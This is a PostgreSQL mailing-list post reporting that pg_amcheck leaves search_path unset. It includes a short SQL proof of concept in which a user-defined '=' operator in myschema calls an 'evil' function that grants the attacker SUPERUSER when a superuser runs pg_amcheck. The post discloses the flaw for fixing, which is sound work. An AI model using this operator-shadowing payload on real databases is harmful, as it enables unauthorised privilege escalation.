Thread
-
Permission elevation by pg_amcheck operator overloading via search_path possible?
Pavel Borisov <pashkin.elfe@gmail.com> — 2026-05-22T12:39:33Z
Hi, hackers! As I see pg_amcheck doesn't set search_path. It runs SQL queries like: SELECT n.nspname, x.extversion FROM pg_catalog.pg_extension x JOIN pg_catalog.pg_namespace n ON x.extnamespace = n.oid WHERE x.extname = 'amcheck' Let's suppose search_path for database is set: search_path = 'myschema, pg_catalog' Then CREATE FUNCTION myschema.evil(name, name) RETURNS bool AS $$ ALTER USER attacker WITH SUPERUSER; SELECT $1 OPERATOR(pg_catalog.=) $2; $$ LANGUAGE sql; CREATE OPERATOR myschema.= (LEFTARG = name, RIGHTARG = name, PROCEDURE = myschema.evil); Then run pg_amcheck as superuser. So the user attacker can become SUPERUSER. Is this scenario worth fixing? Regards, Pavel Borisov Supabase